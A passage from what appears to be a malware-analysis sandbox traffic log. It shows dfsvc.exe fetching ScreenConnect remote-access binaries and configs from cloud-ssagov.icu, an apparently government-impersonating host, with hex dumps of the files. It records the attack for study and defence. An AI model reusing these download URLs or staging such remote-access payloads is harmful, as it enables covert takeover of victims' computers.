AaQBsAGkAdAB5AFAAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAF
2024-11-13 17:26:36 UTC	16384	IN	Data Raw: 73 5a 57 4e 30 49 46 52 76 62 32 77 42 50 45 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 Data Ascii: sZWN0IFRvb2wBPENob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIH
2024-11-13 17:26:36 UTC	16384	IN	Data Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 56 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 41 70 68 2f 57 53 63 31 37 4c 6b 30 6f 49 7a 37 50 51 72 4d 4b 30 45 55 55 66 30 37 75 6d 2f 64 6b 6f 67 41 44 67 68 57 70 47 36 30 50 67 6b 2b 77 78 55 43 6e 35 42 41 4e 49 47 50 6e 4e 39 53 38 4d 6f 54 63 79 53 76 51 63 53 52 31 4b 31 32 45 75 53 7a 68 6a 6d 46 2f 36 61 33 4e 67 2b 6d 75 31 59 50 70 72 53 35 4f 4b 62 52 4e 4e 4e 6e 43 4f 41 77 41 41 47 67 4d 41 41 4a 30 42 41 41 42 69 41 51 41 41 55 41 49 41 41 4d 38 41 41 41 44 78 Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAVAAAAAAAAAFBBRFBBRFAph/WSc17Lk0oIz7PQrMK0EUUf07um/dkogADghWpG60Pgk+wxUCn5BANIGPnN9S8MoTcySvQcSR1K12EuSzhjmF/6a3Ng+mu1YPprS5OKbRNNNnCOAwAAGgMAAJ0BAABiAQAAUAIAAM8AAADx
2024-11-13 17:26:37 UTC	16384	IN	Data Raw: 52 47 4c 47 53 51 41 76 51 66 51 69 53 55 38 6c 4d 44 6c 42 4b 78 78 45 69 6c 32 41 51 74 76 78 4b 49 41 42 6c 44 4c 68 69 6b 42 65 79 69 42 30 33 49 52 4f 4a 4e 49 68 77 69 59 52 71 7a 46 42 66 41 44 6b 68 51 41 42 54 41 6c 73 41 38 42 4f 35 4e 49 50 79 4e 67 6b 59 31 59 57 36 4a 69 65 30 53 53 41 74 44 4b 73 54 45 42 6c 79 2b 42 53 77 70 59 34 5a 74 49 38 51 74 59 63 69 4d 57 53 7a 67 41 31 44 4a 4d 4b 49 47 58 59 31 49 79 41 48 31 76 49 69 6b 51 63 4c 59 52 61 35 38 6c 48 41 42 51 50 53 31 72 2f 69 31 66 41 71 2b 58 6a 63 43 5a 52 46 70 46 77 43 49 62 73 59 34 6f 67 41 47 67 63 6c 4a 7a 41 6b 34 2b 68 68 5a 77 51 39 74 43 61 42 55 43 7a 6a 35 4e 75 45 30 42 44 41 42 56 30 37 63 6e 34 4c 4b 50 49 70 55 57 63 4b 4a 74 49 62 51 4f 41 63 74 73 78 4b 49 41 Data Ascii: RGLGSQAvQfQiSU8lMDlBKxxEil2AQtvxKIABlDLhikBeyiB03IROJNIhwiYRqzFBfADkhQABTAlsA8BO5NIPyNgkY1YW6Jie0SSAtDKsTEBly+BSwpY4ZtI8QtYciMWSzgA1DJMKIGXY1IyAH1vIikQcLYRa58lHABQPS1r/i1fAq+XjcCZRFpFwCIbsY4ogAGgclJzAk4+hhZwQ9tCaBUCzj5NuE0BDABV07cn4LKPIpUWcKJtIbQOActsxKIA
2024-11-13 17:26:37 UTC	2742	IN	Data Raw: 45 71 6e 30 2f 6d 36 76 75 46 33 44 55 41 41 6a 79 75 41 5a 37 59 30 49 61 32 66 6e 35 7a 2b 64 64 61 36 34 58 4e 71 6e 58 57 33 44 30 34 36 58 2f 33 53 41 51 6a 67 34 45 6e 51 4d 2b 2f 32 52 67 2f 67 69 54 31 4b 47 31 39 50 74 73 2f 61 42 54 36 78 64 76 66 30 70 4f 4e 47 44 41 68 67 52 76 4f 78 6c 37 2b 2f 7a 38 7a 73 4e 6e 51 4f 35 63 62 35 61 62 64 64 37 6e 4f 37 69 4f 45 6a 74 32 46 41 41 42 4e 51 42 50 33 2b 34 6b 2f 50 47 39 69 45 31 44 6e 6f 44 76 76 68 58 61 54 77 2b 62 72 66 51 6b 41 41 4d 31 49 52 39 4b 65 4c 50 2f 33 36 72 46 6c 4e 53 42 75 64 37 66 61 6f 6e 32 42 72 32 31 55 59 45 4d 43 4d 55 49 50 31 35 76 4b 50 49 39 5a 68 62 55 35 57 2b 6e 62 62 51 5a 2f 69 52 51 69 37 43 51 4d 43 6d 43 46 72 73 4b 35 38 47 53 6d 41 6e 30 37 4f 30 65 6d 63 Data Ascii: Eqn0/m6vuF3DUAAjyuAZ7Y0Ia2fn5z+dda64XNqnXW3D046X/3SAQjg4EnQM+/2Rg/giT1KG19Pts/aBT6xdvf0pONGDAhgRvOxl7+/z8zsNnQO5cb5abdd7nO7iOEjt2FAABNQBP3+4k/PG9iE1DnoDvvhXaTw+brfQkAAM1IR9KeLP/36rFlNSBud7faon2Br21UYEMCMUIP15vKPI9ZhbU5W+nbbQZ/iRQi7CQMCmCFrsK58GSmAn07O0emc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:38 UTC	98	OUT	GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:38 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 17858 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:38 GMT Connection: close
2024-11-13 17:26:38 UTC	16150	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
2024-11-13 17:26:38 UTC	1708	IN	Data Raw: 36 4d 44 44 6e 53 6c 72 7a 6d 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 Data Ascii: 6MDDnSlrzm2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:44 UTC	100	OUT	GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:44 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 95512 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:43 GMT Connection: close
2024-11-13 17:26:44 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
2024-11-13 17:26:44 UTC	16384	IN	Data Raw: 68 7c dd 40 00 6a 02 e8 85 fe ff ff 83 c4 10 8b f0 ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 Data Ascii: h\|@jut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@
2024-11-13 17:26:44 UTC	16384	IN	Data Raw: 85 c9 74 03 f0 ff 01 8b 88 84 00 00 00 85 c9 74 03 f0 ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 Data Ascii: ttttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF\|t^8uYt8uP0(YYt8uPYYv\|YYtE8u@
2024-11-13 17:26:44 UTC	16384	IN	Data Raw: 59 06 83 c0 18 03 c1 85 db 74 1b 8b 7d 0c 8b 70 0c 3b fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 Data Ascii: Yt}p;rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@\|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UE
2024-11-13 17:26:44 UTC	16384	IN	Data Raw: 67 00 62 00 00 00 64 00 61 00 2d 00 64 00 6b 00 00 00 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d Data Ascii: gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-
2024-11-13 17:26:44 UTC	13826	IN	Data Raw: a0 32 b6 32 cc 32 e3 32 ea 32 f6 32 09 33 0e 33 1a 33 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 Data Ascii: 2222223333033333444(414B4T4o44444/595?5E555557%88P9h9999999999O::;p;{;;;,<<<W======>>>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:45 UTC	108	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:46 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 61208 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:45 GMT Connection: close
2024-11-13 17:26:46 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 63 2b 80 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 b8 72 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc+"0 @ r@
2024-11-13 17:26:46 UTC	16384	IN	Data Raw: 16 00 7a 16 7f 0e 16 00 58 0d 87 0e 36 00 6d 08 8f 0e 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d Data Ascii: zX6m"`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
2024-11-13 17:26:46 UTC	16384	IN	Data Raw: 61 72 63 68 42 6f 78 49 6e 70 75 74 4c 65 6e 67 74 68 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d Data Ascii: archBoxInputLengthThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParam
2024-11-13 17:26:46 UTC	12290	IN	Data Raw: 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3c 00 0c 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 33 00 2e 00 37 00 2e 00 39 00 30 00 36 00 37 00 00 00 40 00 0c 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 33 00 2e 00 37 00 2e Data Ascii: ScreenConnect.WindowsBackstageShell.exe<ProductNameScreenConnect<ProductVersion24.3.7.9067@Assembly Version24.3.7.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:47 UTC	112	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:47 UTC	232	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:47 GMT Connection: close
2024-11-13 17:26:47 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:48 UTC	107	OUT	GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:48 UTC	232	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:48 GMT Connection: close
